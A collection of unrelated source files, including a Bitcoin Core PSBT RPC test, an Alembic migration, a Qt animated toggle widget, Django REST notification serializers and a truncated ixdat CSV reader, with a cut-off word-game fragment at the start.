"+word_mass[z2-1]) with codecs.open(file_alphabet, 'a',encoding='utf8') as file: # --> запись в текстовый файл file.write(word_mass[z2-1]) else: s = ''.join(secret_word) # --> преобразование из списка в строку print(s) with codecs.open(filename, 'w',encoding='utf8') as file: # --> запись в текстовый файл file.write(s)
the-stack_106_24345
#!/usr/bin/env python3 # Copyright (c) 2018 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test the Partially Signed Transaction RPCs. """ from test_framework.test_framework import BitcoinTestFramework from test_framework.util import assert_equal, assert_raises_rpc_error, find_output, disconnect_nodes, connect_nodes_bi, sync_blocks import json import os MAX_BIP125_RBF_SEQUENCE = 0xfffffffd # Create one-input, one-output, no-fee transaction: class PSBTTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = False self.num_nodes = 3 def skip_test_if_missing_module(self): self.skip_if_no_wallet() def test_utxo_conversion(self): mining_node = self.nodes[2] offline_node = self.nodes[0] online_node = self.nodes[1] # Disconnect offline node from others disconnect_nodes(offline_node, 1) disconnect_nodes(online_node, 0) disconnect_nodes(offline_node, 2) disconnect_nodes(mining_node, 0) # Mine a transaction that credits the offline address offline_addr = offline_node.getnewaddress(address_type="p2sh-segwit") online_addr = online_node.getnewaddress(address_type="p2sh-segwit") online_node.importaddress(offline_addr, "", False) mining_node.sendtoaddress(address=offline_addr, amount=1.0) mining_node.generate(nblocks=1) sync_blocks([mining_node, online_node]) # Construct an unsigned PSBT on the online node (who doesn't know the output is Segwit, so will include a non-witness UTXO) utxos = online_node.listunspent(addresses=[offline_addr]) raw = online_node.createrawtransaction([{"txid":utxos[0]["txid"], "vout":utxos[0]["vout"]}],[{online_addr:0.9999}]) psbt = online_node.walletprocesspsbt(online_node.converttopsbt(raw))["psbt"] assert("non_witness_utxo" in mining_node.decodepsbt(psbt)["inputs"][0]) # Have the offline node sign the PSBT (which will update the UTXO to segwit) signed_psbt = offline_node.walletprocesspsbt(psbt)["psbt"] assert("witness_utxo" in mining_node.decodepsbt(signed_psbt)["inputs"][0]) # Make sure we can mine the resulting transaction txid = mining_node.sendrawtransaction(mining_node.finalizepsbt(signed_psbt)["hex"]) mining_node.generate(1) sync_blocks([mining_node, online_node]) assert_equal(online_node.gettxout(txid,0)["confirmations"], 1) # Reconnect connect_nodes_bi(self.nodes, 0, 1) connect_nodes_bi(self.nodes, 0, 2) def run_test(self): # Create and fund a raw tx for sending 10 BTC psbtx1 = self.nodes[0].walletcreatefundedpsbt([], {self.nodes[2].getnewaddress():10})['psbt'] # Node 1 should not be able to add anything to it but still return the psbtx same as before psbtx = self.nodes[1].walletprocesspsbt(psbtx1)['psbt'] assert_equal(psbtx1, psbtx) # Sign the transaction and send signed_tx = self.nodes[0].walletprocesspsbt(psbtx)['psbt'] final_tx = self.nodes[0].finalizepsbt(signed_tx)['hex'] self.nodes[0].sendrawtransaction(final_tx) # Create p2sh, p2wpkh, and p2wsh addresses pubkey0 = self.nodes[0].getaddressinfo(self.nodes[0].getnewaddress())['pubkey'] pubkey1 = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['pubkey'] pubkey2 = self.nodes[2].getaddressinfo(self.nodes[2].getnewaddress())['pubkey'] p2sh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "legacy")['address'] p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "bech32")['address'] p2sh_p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "p2sh-segwit")['address'] p2wpkh = self.nodes[1].getnewaddress("", "bech32") p2pkh = self.nodes[1].getnewaddress("", "legacy") p2sh_p2wpkh = self.nodes[1].getnewaddress("", "p2sh-segwit") # fund those addresses rawtx = self.nodes[0].createrawtransaction([], {p2sh:10, p2wsh:10, p2wpkh:10, p2sh_p2wsh:10, p2sh_p2wpkh:10, p2pkh:10}) rawtx = self.nodes[0].fundrawtransaction(rawtx, {"changePosition":3}) signed_tx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex'])['hex'] txid = self.nodes[0].sendrawtransaction(signed_tx) self.nodes[0].generate(6) self.sync_all() # Find the output pos p2sh_pos = -1 p2wsh_pos = -1 p2wpkh_pos = -1 p2pkh_pos = -1 p2sh_p2wsh_pos = -1 p2sh_p2wpkh_pos = -1 decoded = self.nodes[0].decoderawtransaction(signed_tx) for out in decoded['vout']: if out['scriptPubKey']['addresses'][0] == p2sh: p2sh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2wsh: p2wsh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2wpkh: p2wpkh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2sh_p2wsh: p2sh_p2wsh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2sh_p2wpkh: p2sh_p2wpkh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2pkh: p2pkh_pos = out['n'] # spend single key from node 1 rawtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wpkh_pos},{"txid":txid,"vout":p2sh_p2wpkh_pos},{"txid":txid,"vout":p2pkh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt'] walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(rawtx) assert_equal(walletprocesspsbt_out['complete'], True) self.nodes[1].sendrawtransaction(self.nodes[1].finalizepsbt(walletprocesspsbt_out['psbt'])['hex']) # partially sign multisig things with node 1 psbtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wsh_pos},{"txid":txid,"vout":p2sh_pos},{"txid":txid,"vout":p2sh_p2wsh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt'] walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(psbtx) psbtx = walletprocesspsbt_out['psbt'] assert_equal(walletprocesspsbt_out['complete'], False) # partially sign with node 2. This should be complete and sendable walletprocesspsbt_out = self.nodes[2].walletprocesspsbt(psbtx) assert_equal(walletprocesspsbt_out['complete'], True) self.nodes[2].sendrawtransaction(self.nodes[2].finalizepsbt(walletprocesspsbt_out['psbt'])['hex']) # check that walletprocesspsbt fails to decode a non-psbt rawtx = self.nodes[1].createrawtransaction([{"txid":txid,"vout":p2wpkh_pos}], {self.nodes[1].getnewaddress():9.99}) assert_raises_rpc_error(-22, "TX decode failed", self.nodes[1].walletprocesspsbt, rawtx) # Convert a non-psbt to psbt and make sure we can decode it rawtx = self.nodes[0].createrawtransaction([], {self.nodes[1].getnewaddress():10}) rawtx = self.nodes[0].fundrawtransaction(rawtx) new_psbt = self.nodes[0].converttopsbt(rawtx['hex']) self.nodes[0].decodepsbt(new_psbt) # Make sure that a psbt with signatures cannot be converted signedtx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex']) assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex']) assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex'], False) # Unless we allow it to convert and strip signatures self.nodes[0].converttopsbt(signedtx['hex'], True) # Explicitly allow converting non-empty txs new_psbt = self.nodes[0].converttopsbt(rawtx['hex']) self.nodes[0].decodepsbt(new_psbt) # Create outputs to nodes 1 and 2 node1_addr = self.nodes[1].getnewaddress() node2_addr = self.nodes[2].getnewaddress() txid1 = self.nodes[0].sendtoaddress(node1_addr, 13) txid2 =self.nodes[0].sendtoaddress(node2_addr, 13) self.nodes[0].generate(6) self.sync_all() vout1 = find_output(self.nodes[1], txid1, 13) vout2 = find_output(self.nodes[2], txid2, 13) # Create a psbt spending outputs from nodes 1 and 2 psbt_orig = self.nodes[0].createpsbt([{"txid":txid1, "vout":vout1}, {"txid":txid2, "vout":vout2}], {self.nodes[0].getnewaddress():25.999}) # Update psbts, should only have data for one input and not the other psbt1 = self.nodes[1].walletprocesspsbt(psbt_orig)['psbt'] psbt1_decoded = self.nodes[0].decodepsbt(psbt1) assert psbt1_decoded['inputs'][0] and not psbt1_decoded['inputs'][1] psbt2 = self.nodes[2].walletprocesspsbt(psbt_orig)['psbt'] psbt2_decoded = self.nodes[0].decodepsbt(psbt2) assert not psbt2_decoded['inputs'][0] and psbt2_decoded['inputs'][1] # Combine, finalize, and send the psbts combined = self.nodes[0].combinepsbt([psbt1, psbt2]) finalized = self.nodes[0].finalizepsbt(combined)['hex'] self.nodes[0].sendrawtransaction(finalized) self.nodes[0].generate(6) self.sync_all() # Test additional args in walletcreatepsbt # Make sure both pre-included and funded inputs # have the correct sequence numbers based on # replaceable arg block_height = self.nodes[0].getblockcount() unspent = self.nodes[0].listunspent()[0] psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height+2, {"replaceable":True}, False) decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"]) for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]): assert_equal(tx_in["sequence"], MAX_BIP125_RBF_SEQUENCE) assert "bip32_derivs" not in psbt_in assert_equal(decoded_psbt["tx"]["locktime"], block_height+2) # Same construction with only locktime set psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height, {}, True) decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"]) for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]): assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE assert "bip32_derivs" in psbt_in assert_equal(decoded_psbt["tx"]["locktime"], block_height) # Same construction without optional arguments psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}]) decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"]) for tx_in in decoded_psbt["tx"]["vin"]: assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE assert_equal(decoded_psbt["tx"]["locktime"], 0) # Regression test for 14473 (mishandling of already-signed witness transaction): psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}]) complete_psbt = self.nodes[0].walletprocesspsbt(psbtx_info["psbt"]) double_processed_psbt = self.nodes[0].walletprocesspsbt(complete_psbt["psbt"]) assert_equal(complete_psbt, double_processed_psbt) # We don't care about the decode result, but decoding must succeed. self.nodes[0].decodepsbt(double_processed_psbt["psbt"]) # BIP 174 Test Vectors # Check that unknown values are just passed through unknown_psbt = "cHNidP8BAD8CAAAAAf//////////////////////////////////////////AAAAAAD/////AQAAAAAAAAAAA2oBAAAAAAAACg8BAgMEBQYHCAkPAQIDBAUGBwgJCgsMDQ4PAAA=" unknown_out = self.nodes[0].walletprocesspsbt(unknown_psbt)['psbt'] assert_equal(unknown_psbt, unknown_out) # Open the data file with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_psbt.json'), encoding='utf-8') as f: d = json.load(f) invalids = d['invalid'] valids = d['valid'] creators = d['creator'] signers = d['signer'] combiners = d['combiner'] finalizers = d['finalizer'] extractors = d['extractor'] # Invalid PSBTs for invalid in invalids: assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decodepsbt, invalid) # Valid PSBTs for valid in valids: self.nodes[0].decodepsbt(valid) # Creator Tests for creator in creators: created_tx = self.nodes[0].createpsbt(creator['inputs'], creator['outputs']) assert_equal(created_tx, creator['result']) # Signer tests for i, signer in enumerate(signers): self.nodes[2].createwallet("wallet{}".format(i)) wrpc = self.nodes[2].get_wallet_rpc("wallet{}".format(i)) for key in signer['privkeys']: wrpc.importprivkey(key) signed_tx = wrpc.walletprocesspsbt(signer['psbt'])['psbt'] assert_equal(signed_tx, signer['result']) # Combiner test for combiner in combiners: combined = self.nodes[2].combinepsbt(combiner['combine']) assert_equal(combined, combiner['result']) # Finalizer test for finalizer in finalizers: finalized = self.nodes[2].finalizepsbt(finalizer['finalize'], False)['psbt'] assert_equal(finalized, finalizer['result']) # Extractor test for extractor in extractors: extracted = self.nodes[2].finalizepsbt(extractor['extract'], True)['hex'] assert_equal(extracted, extractor['result']) # Unload extra wallets for i, signer in enumerate(signers): self.nodes[2].unloadwallet("wallet{}".format(i)) self.test_utxo_conversion() # Test that psbts with p2pkh outputs are created properly p2pkh = self.nodes[0].getnewaddress(address_type='legacy') psbt = self.nodes[1].walletcreatefundedpsbt([], [{p2pkh : 1}], 0, {"includeWatching" : True}, True) self.nodes[0].decodepsbt(psbt['psbt']) if __name__ == '__main__': PSBTTest().main()
the-stack_106_24348
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ create role invitation table Revision ID: 80018e46c5a4 Revises: 87509f4ae027 Create Date: 2020-06-28 14:53:07.803972 """ import sqlalchemy as sa from alembic import op from sqlalchemy.dialects import postgresql revision = "80018e46c5a4" down_revision = "87509f4ae027" def upgrade(): op.create_table( "role_invitations", sa.Column( "id", postgresql.UUID(as_uuid=True), server_default=sa.text("gen_random_uuid()"), nullable=False, ), sa.Column("invite_status", sa.Text(), nullable=False), sa.Column("token", sa.Text(), nullable=False), sa.Column("user_id", postgresql.UUID(as_uuid=True), nullable=False), sa.Column("project_id", postgresql.UUID(as_uuid=True), nullable=False), sa.ForeignKeyConstraint( ["project_id"], ["projects.id"], onupdate="CASCADE", ondelete="CASCADE" ), sa.ForeignKeyConstraint( ["user_id"], ["users.id"], onupdate="CASCADE", ondelete="CASCADE" ), sa.PrimaryKeyConstraint("id"), sa.UniqueConstraint( "user_id", "project_id", name="_role_invitations_user_project_uc" ), ) op.create_index( "role_invitations_user_id_idx", "role_invitations", ["user_id"], unique=False ) def downgrade(): op.drop_index("role_invitations_user_id_idx", table_name="role_invitations") op.drop_table("role_invitations")
the-stack_106_24350
import sys if 'PyQt5' in sys.modules: from PyQt5.QtCore import ( Qt, QSize, QPoint, QPointF, QRectF, QEasingCurve, QPropertyAnimation, QSequentialAnimationGroup, pyqtSlot, pyqtProperty) from PyQt5.QtWidgets import QCheckBox from PyQt5.QtGui import QColor, QBrush, QPaintEvent, QPen, QPainter from PyQt5.QtCore import pyqtSlot as Slot, pyqtProperty as Property elif 'PySide2' in sys.modules: from PySide2.QtCore import ( Qt, QSize, QPoint, QPointF, QRectF, QEasingCurve, QPropertyAnimation, QSequentialAnimationGroup, Slot, Property) from PySide2.QtWidgets import QCheckBox from PySide2.QtGui import QColor, QBrush, QPaintEvent, QPen, QPainter else: from PySide6.QtCore import ( Qt, QSize, QPoint, QPointF, QRectF, QEasingCurve, QPropertyAnimation, QSequentialAnimationGroup, Slot, Property) from PySide6.QtWidgets import QCheckBox from PySide6.QtGui import QColor, QBrush, QPaintEvent, QPen, QPainter class Toggle(QCheckBox): _transparent_pen = QPen(Qt.transparent) _light_grey_pen = QPen(Qt.lightGray) def __init__(self, parent=None, bar_color=Qt.gray, checked_color="#00B0FF", handle_color=Qt.white, ): super().__init__(parent) # Save our properties on the object via self, so we can access them later # in the paintEvent. self._bar_brush = QBrush(bar_color) self._bar_checked_brush = QBrush(QColor(checked_color).lighter()) self._handle_brush = QBrush(handle_color) self._handle_checked_brush = QBrush(QColor(checked_color)) # Setup the rest of the widget. self.setContentsMargins(8, 0, 8, 0) self._handle_position = 0 self.stateChanged.connect(self.handle_state_change) def sizeHint(self): return QSize(58, 45) def hitButton(self, pos: QPoint): return self.contentsRect().contains(pos) def paintEvent(self, e: QPaintEvent): contRect = self.contentsRect() handleRadius = round(0.24 * contRect.height()) p = QPainter(self) p.setRenderHint(QPainter.Antialiasing) p.setPen(self._transparent_pen) barRect = QRectF( 0, 0, contRect.width() - handleRadius, 0.40 * contRect.height() ) barRect.moveCenter(contRect.center()) rounding = barRect.height() / 2 # the handle will move along this line trailLength = contRect.width() - 2 * handleRadius xPos = contRect.x() + handleRadius + trailLength * self._handle_position if self.isChecked(): p.setBrush(self._bar_checked_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setBrush(self._handle_checked_brush) else: p.setBrush(self._bar_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setPen(self._light_grey_pen) p.setBrush(self._handle_brush) p.drawEllipse( QPointF(xPos, barRect.center().y()), handleRadius, handleRadius) p.end() @Slot(int) def handle_state_change(self, value): self._handle_position = 1 if value else 0 @Property(float) def handle_position(self): return self._handle_position @handle_position.setter def handle_position(self, pos): """change the property we need to trigger QWidget.update() method, either by: 1- calling it here [ what we're doing ]. 2- connecting the QPropertyAnimation.valueChanged() signal to it. """ self._handle_position = pos self.update() @Property(float) def pulse_radius(self): return self._pulse_radius @pulse_radius.setter def pulse_radius(self, pos): self._pulse_radius = pos self.update() class AnimatedToggle(Toggle): _transparent_pen = QPen(Qt.transparent) _light_grey_pen = QPen(Qt.lightGray) def __init__(self, *args, pulse_unchecked_color="#44999999", pulse_checked_color="#4400B0EE", **kwargs): self._pulse_radius = 0 super().__init__(*args, **kwargs) self.animation = QPropertyAnimation(self, b"handle_position", self) self.animation.setEasingCurve(QEasingCurve.InOutCubic) self.animation.setDuration(200) # time in ms self.pulse_anim = QPropertyAnimation(self, b"pulse_radius", self) self.pulse_anim.setDuration(350) # time in ms self.pulse_anim.setStartValue(10) self.pulse_anim.setEndValue(20) self.animations_group = QSequentialAnimationGroup() self.animations_group.addAnimation(self.animation) self.animations_group.addAnimation(self.pulse_anim) self._pulse_unchecked_animation = QBrush(QColor(pulse_unchecked_color)) self._pulse_checked_animation = QBrush(QColor(pulse_checked_color)) @Slot(int) def handle_state_change(self, value): self.animations_group.stop() if value: self.animation.setEndValue(1) else: self.animation.setEndValue(0) self.animations_group.start() def paintEvent(self, e: QPaintEvent): contRect = self.contentsRect() handleRadius = round(0.24 * contRect.height()) p = QPainter(self) p.setRenderHint(QPainter.Antialiasing) p.setPen(self._transparent_pen) barRect = QRectF( 0, 0, contRect.width() - handleRadius, 0.40 * contRect.height() ) barRect.moveCenter(contRect.center()) rounding = barRect.height() / 2 # the handle will move along this line trailLength = contRect.width() - 2 * handleRadius xPos = contRect.x() + handleRadius + trailLength * self._handle_position if self.pulse_anim.state() == QPropertyAnimation.Running: p.setBrush( self._pulse_checked_animation if self.isChecked() else self._pulse_unchecked_animation) p.drawEllipse(QPointF(xPos, barRect.center().y()), self._pulse_radius, self._pulse_radius) if self.isChecked(): p.setBrush(self._bar_checked_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setBrush(self._handle_checked_brush) else: p.setBrush(self._bar_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setPen(self._light_grey_pen) p.setBrush(self._handle_brush) p.drawEllipse( QPointF(xPos, barRect.center().y()), handleRadius, handleRadius) p.end()
the-stack_106_24352
# -*- coding: utf-8 -*- from rest_framework import serializers from rest_framework.reverse import NoReverseMatch, reverse from tandlr.core.api.serializers import ModelSerializer from tandlr.users.serializers import UserSerializer from .models import Notification class NotificationTargetSerializer(serializers.Serializer): """ Custom serializer for the 'target' attribute of the ```tandlr.notifications.models.Notification``` model. """ id = serializers.IntegerField(source='target_id') type = serializers.CharField(source='target._meta.model_name') action = serializers.CharField(source='target_action') resource_uri = serializers.SerializerMethodField() def get_action(self, obj): return 'created' def get_resource_uri(self, obj): """ Tries to return the resource uri for the given object if a proper viewset is registered in the API. Otherwise returns None. """ url_name = 'api:v1:{0}-detail'.format(obj.target._meta.model_name) try: return reverse( url_name, args=[obj.target_id], request=self.context.get('request', None) ) except NoReverseMatch: return None class NotificationSerializer(ModelSerializer): """ Serializer class for the ```tandlr.notifications.models.Notification``` model. """ sender = serializers.SerializerMethodField() target = serializers.SerializerMethodField() class Meta: model = Notification fields = [ 'id', 'body', 'sender', 'target', 'was_delivered', 'is_read', 'created_date', 'last_modified' ] def get_sender(self, obj): """ Returns the notification's sender serialized with the minimal required fields. """ if obj.sender: serializer = UserSerializer( obj.sender, context=self.context, fields=[ 'id', 'username', 'email', 'name', 'last_name', 'second_last_name', 'photo' ] ) return serializer.data def get_target(self, obj): """ Returns the notification's target serialized with the minimal required fields. """ if obj.target: serializer = NotificationTargetSerializer( obj, context=self.context) return serializer.data class NotificationV2Serializer(ModelSerializer): """ Serializer class for the ```tandlr.notifications.models.Notification``` model. """ sender = serializers.SerializerMethodField() target = serializers.SerializerMethodField() class Meta: model = Notification fields = [ 'id', 'body', 'sender', 'target', 'was_delivered', 'is_read', 'created_date', 'last_modified' ] def get_sender(self, obj): """ Returns the notification's sender serialized with the minimal required fields. """ if obj.sender: serializer = UserSerializer( obj.sender, context=self.context, fields=[ 'id', 'username', 'email', 'name', 'last_name', 'second_last_name', 'photo', 'thumbnail' ] ) return serializer.data def get_target(self, obj): """ Returns the notification's target serialized with the minimal required fields. """ if obj.target: serializer = NotificationTargetSerializer( obj, context=self.context ) return serializer.data
the-stack_106_24353
"""Module defining the ixdat csv reader, so ixdat can read the files it exports.""" from pathlib import Path import numpy as np import re import pandas as pd from ..exceptions import ReadError from ..data_series import ValueSeries, TimeSeries, DataSeries, Field from ..measurements import Measurement from ..spectra import Spectrum, SpectrumSeries from ..techniques import TECHNIQUE_CLASSES regular_expressions = { "tstamp": r"tstamp = ([0-9\.]+)", "technique": r"technique = ([A-Za-z\-]+)\n", "N_header_lines": r"N_header_lines = ([0-9]+)", "backend_name": r"backend_name = (\w+)", "id": r"id = ([0-9]+)", "timecol": r"timecol '(.+)' for: (?:'(.+)')$", "unit": r"/ [(.+)]", "aux_file": r"'(.*)' in file: '(.*)'", } class IxdatCSVReader: """A class that reads the csv's made by ixdat.exporters.csv_exporter.CSVExporter read() is the important method - it takes the path to the mpt file as argument and returns an ECMeasurement object (ec_measurement) representing that file. The ECMeasurement contains a reference to the BiologicMPTReader object, as ec_measurement.reader. This makes available all the following stuff, likely useful for debugging. Attributes: path_to_file (Path): the location and name of the file read by the reader n_line (int): the number of the last line read by the reader place_in_file (str): The last location in the file read by the reader. This is used internally to tell the reader how to parse each line. Options are: "header", "column names", and "data". header_lines (list of str): a list of the header lines of the files. This includes the column name line. The header can be nicely viewed with the print_header() function. tstamp (str): The unix time corresponding to t=0 technique (str): The name of the technique N_header_lines (int): The number of lines in the header of the file column_names (list of str): The names of the data columns in the file column_data (dict of str: np.array): The data in the file as a dict. Note that the np arrays are the same ones as in the measurement's DataSeries, so this does not waste memory. file_has_been_read (bool): This is used to make sure read() is only successfully called once by the Reader. False until read() is called, then True. measurement (Measurement): The measurement returned by read() when the file is read. self.measureemnt is None before read() is called. """ delim = "," def __init__(self): """Initialize a Reader for ixdat-exported .csv files. See class docstring.""" self.name = None self.path_to_file = None self.n_line = 0 self.place_in_file = "header" self.header_lines = [] self.tstamp = None self.N_header_lines = None self.timecols = {} self.column_names = [] self.column_data = {} self.technique = None self.aux_series_list = [] self.measurement_class = Measurement self.file_has_been_read = False self.measurement = None def read(self, path_to_file, name=None, cls=None, **kwargs): """Return a Measurement with the data and metadata recorded in path_to_file This loops through the lines of the file, processing one at a time. For header lines, this involves searching for metadata. For the column name line, this involves creating empty arrays for each data series. For the data lines, this involves appending to these arrays. After going through all the lines, it converts the arrays to DataSeries. The technique is specified in the header, and used to pick the TechniqueMeasurement class. Finally, the method returns a TechniqueMeasurement object `measurement` with these DataSeries. All attributes of this reader can be accessed from the measurement as `measurement.reader.attribute_name`. Args: path_to_file (Path): The full abs or rel path including the ".mpt" extension name (str): The name of the measurement to return (defaults to path_to_file) cls (Measurement subclass): The class of measurement to return. By default, cls will be determined from the technique specified in the header of path_to_file. **kwargs (dict): Key-word arguments are passed to ECMeasurement.__init__ Returns cls: a Measurement of type cls """ path_to_file = Path(path_to_file) if path_to_file else self.path_to_file if self.file_has_been_read: print( f"This {self.__class__.__name__} has already read {self.path_to_file}." " Returning the measurement resulting from the original read. " "Use a new Reader if you want to read another file." ) return self.measurement self.name = name or path_to_file.name self.path_to_file = path_to_file with open(self.path_to_file, "r") as f: for line in f: self.process_line(line) for name in self.column_names: self.column_data[name] = np.array(self.column_data[name]) data_series_dict = {} for tcol_name in self.timecols: # then it's time! data_series_dict[tcol_name] = TimeSeries( name=tcol_name, unit_name=get_column_unit(tcol_name) or "s", data=self.column_data[tcol_name], tstamp=self.tstamp, ) for column_name, data in self.column_data.items(): if column_name in self.timecols: continue try: tcol_name = next( tcol_name for tcol_name in self.timecols if column_name in self.timecols[tcol_name] ) except StopIteration: # debugging raise ReadError( f"can't find tcol for {column_name}. timecols={self.timecols}" ) tseries = data_series_dict[tcol_name] vseries = ValueSeries( name=column_name, data=data, tseries=tseries, unit_name=get_column_unit(column_name), ) data_series_dict[column_name] = vseries data_series_list = list(data_series_dict.values()) + self.aux_series_list obj_as_dict = dict( name=self.name, technique=self.technique, reader=self, series_list=data_series_list, tstamp=self.tstamp, ) obj_as_dict.update(kwargs) if issubclass(cls, self.measurement_class): self.measurement_class = cls if issubclass(self.measurement_class, TECHNIQUE_CLASSES["EC"]): # this is how ECExporter exports current and potential: obj_as_dict["raw_potential_names"] = ("raw potential / [V]",) obj_as_dict["raw_current_names"] = ("raw current / [mA]",) self.measurement = self.measurement_class.from_dict(obj_as_dict) self.file_has_been_read = True return self.measurement def process_line(self, line): """Call the correct line processing method depending on self.place_in_file""" if self.place_in_file == "header": self.process_header_line(line) elif self.place_in_file == "column names": self.process_column_line(line) elif self.place_in_file == "data": self.process_data_line(line) else: # just for debugging raise ReadError(f"place_in_file = {self.place_in_file}") self.n_line += 1 def process_header_line(self, line): """Search line for important metadata and set the relevant attribute of self""" self.header_lines.append(line) N_head_match = re.search(regular_expressions["N_header_lines"], line) if N_head_match: self.N_header_lines = int(N_head_match.group(1)) return timestamp_match = re.search(regular_expressions["tstamp"], line) if timestamp_match: self.tstamp = float(timestamp_match.group(1)) return technique_match = re.search(regular_expressions["technique"], line) if technique_match: self.technique = technique_match.group(1) if self.technique in TECHNIQUE_CLASSES: if issubclass( TECHNIQUE_CLASSES[self.technique], self.measurement_class ): self.measurement_class = TECHNIQUE_CLASSES[self.technique] return timecol_match = re.search(regular_expressions["timecol"], line) if timecol_match: tcol = timecol_match.group(1) self.timecols[tcol] = [] for vcol in timecol_match.group(2).split("' and '"): self.timecols[tcol].append(vcol) aux_file_match = re.search(regular_expressions["aux_file"], line) if aux_file_match: aux_file_name = aux_file_match.group(1) aux_file = self.path_to_file.parent / aux_file_match.group(2) self.read_aux_file(aux_file, name=aux_file_name) if self.N_header_lines and self.n_line >= self.N_header_lines - 2: self.place_in_file = "column names" def process_column_line(self, line): """Split the line to get the names of the file's data columns""" self.header_lines.append(line) self.column_names = [name.strip() for name in line.split(self.delim)] self.column_data.update({name: [] for name in self.column_names}) self.place_in_file = "data" def process_data_line(self, line): """Split the line and append the numbers the corresponding data column arrays""" data_strings_from_line = line.strip().split(self.delim) for name, value_string in zip(self.column_names, data_strings_from_line): if value_string: try: value = float(value_string) except ValueError: # That is probably because different columns are different length. # so we just skip it! continue # raise ReadError(f"can't parse value string '{value_string}'") self.column_data[name].append(value) def read_aux_file(self, path_to_aux_file, name): """Read an auxiliary file and include its series list in the measurement""" spec = IxdatSpectrumReader().read(path_to_aux_file, name=name) self.aux_series_list += spec.series_list def print_header(self): """Print the file header including column names. read() must be called first.""" header = "".join(self.header_lines) print(header) def get_column_unit(column_name): """Return the unit name of an ixdat column, i.e the part of the name after the '/'""" unit_match = re.search(regular_expressions["unit"], column_name) if unit_match: unit_name = unit_match.group(1) else: unit_name = None return unit_name class IxdatSpectrumReader(IxdatCSVReader): """A reader for ixdat spectra.""" def read(self, path_to_file, name=None, cls=None, **kwargs): """Read an ixdat spectrum. This reads the header with the process_line() function inherited from IxdatCSVReader. Then it uses pandas to read the data. Args: path_to_file (Path): The full abs or rel path including the ".mpt" extension name (str): The name of the measurement to return (defaults to path_to_file) cls (Spectrum subclass): The class of measurement to return. By default, cls will be determined from the technique specified in the header of path_to_file. **kwargs (dict): Key-word arguments are passed to ECMeasurement.__init__ Returns cls: a Spectrum of type cls """ with open(path_to_file, "r") as f: for line in f: if self.place_in_file == "header": self.process_line(line) else: break df = pd.read_csv(path_to_file, sep=",", header=self.N_header_lines - 2) if self.technique == "spectrum": # FIXME: in the future, this needs to cover all spectrum classes x_name, y_name = tuple(df.keys()) x = df[x_name].to_numpy() y = df[y_name].to_numpy() cls = cls or Spectrum return cls.from_data( # see Spectrum.from_data() x, y, self.tstamp, x_name, y_name, name=self.name, technique=self.technique, reader=self, ) elif self.technique == "spectra": # FIXME: in the future, this needs to cover all spectrum series classes names = {} units = {} swap_axes = False for line in self.header_lines: for line_start in ("values", "first row", "first column"): if line.startswith(line_start): t_x_or_y = re.search("([yxt])=", line).group(1) names[t_x_or_y] = re.search(r"\'(.*)\'", line).group(1) units[t_x_or_y] = re.search(r"\[(.*)\]", line).group(1) if "row" in line_start and t_x_or_y == "t": # check! swap_axes = True z1 = np.array([float(key) for key in list(df.keys())[1:]]) z1_and_y = df.to_numpy() z0 = z1_and_y[:, 0] y = z1_and_y[:, 1:] if swap_axes: # This is the case if the file was export with spectra_as_rows = False. t = z1 x = z0 y = y.swapaxes(0, 1) else: t = z0 x = z1 tseries = TimeSeries( name=names["t"], unit_name=units["t"], data=t, tstamp=self.tstamp ) xseries = DataSeries(name=names["x"], unit_name=units["x"], data=x) field = Field( name=names["y"], unit_name=units["y"], 